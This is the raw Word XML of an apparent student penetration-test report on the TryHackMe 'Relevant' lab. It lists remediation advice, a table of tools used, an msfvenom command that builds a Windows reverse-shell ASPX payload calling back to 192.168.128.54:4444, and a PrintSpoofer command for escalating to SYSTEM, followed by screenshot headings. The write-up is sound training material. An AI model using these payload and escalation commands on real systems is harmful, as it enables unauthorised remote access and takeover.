    <w:p w14:paraId="4305C44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Low Priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110DB4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~Implement Network segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0989EA5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~Deploy endpoint protection for threat detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1694742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~Conduct regular Penetration tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606AB1A8">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~Develop Incident response procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D3D9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~Implement security awareness training</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D2C4B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="C81D31" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C81D31" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Appendices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24147153">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Tool and output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0"/>
        <w:gridCol w:w="6334"/>
      </w:tblGrid>
      <w:tr w14:paraId="28D86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E6A5FF">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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1518206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Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="322CD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55266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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76828D0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Open ports: 80,135,139,445,3389,49663,49666 and 49667</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3010F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AEDE7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smbclient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70CBF95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Vulnerable shared folder and user credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="08355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A9CA6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msfvenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AAE0EB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Successful reverse shell payload generation i.e. shell.aspx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="60E71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40DAD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Netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F5438D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Reverse shell access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="084B4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DD711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PrintSpoofer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15D86CE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Privilege escalated to SYSTEM level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="66C05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78F16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PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08EDF41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Command execution and file access and retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1D80C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73DF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base64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C1D203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Decoded user credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C400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207BE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curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2647C07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triggered the http request for shell to allow remote access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4554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2338E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VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16FDBF7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Enable starting machine for the Relevant Try Hack Me Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E7113A6">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Style w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECAFCB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reverse shell payload command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434721A7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.128.54 LPORT=4444 -f aspx -o shell.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F4EA8B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PrintSpoofer command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6160636C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PrintSpoofer64.exe -i -c cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B95A23">
      <w:pPr>
        <w:pStyle w:val="2"/>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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Screenshots of exploitation steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AD11D6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2785110"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1524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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="2785110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D932AB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.1 VPN connection. Configuration file is found from the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://tryhackme.com/access" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> TryHackMeAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F37A72">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232E5549">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2482215"/>
            <wp:effectExtent l="0" t="0" r="13970" b="13335"/>
            <wp:docPr id="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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5262880" cy="2482215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6119E395">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2 Start Machine to obtain target IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492AF0A8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C91D39">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="6067425"/>
            <wp:effectExtent l="0" t="0" r="4445" b="9525"/>
            <wp:docPr id="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7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="6067425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A2BFBE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.3.1 Nmap scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D26965F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="5924550"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>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8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="5924550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB14472">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.3.2 Nmap scan complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57320BAA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="4807585"/>
            <wp:effectExtent l="0" t="0" r="3175" b="12065"/>
            <wp:docPr id="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9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273675" cy="4807585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="490975F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.3.3 Nmap scan to find dynamic high port that are open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06399857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C0F3AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1305560"/>
            <wp:effectExtent l="0" t="0" r="10160" b="8890"/>
            <wp:docPr id="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0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="1305560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4443A827">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AAA86F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.4 SMB Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9AC1A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2799715"/>
            <wp:effectExtent l="0" t="0" r="10160" b="635"/>
            <wp:docPr id="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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="2799715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21556E8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7D9CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.5 Credentials discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28378124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1131B796">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E906CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040B7079">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
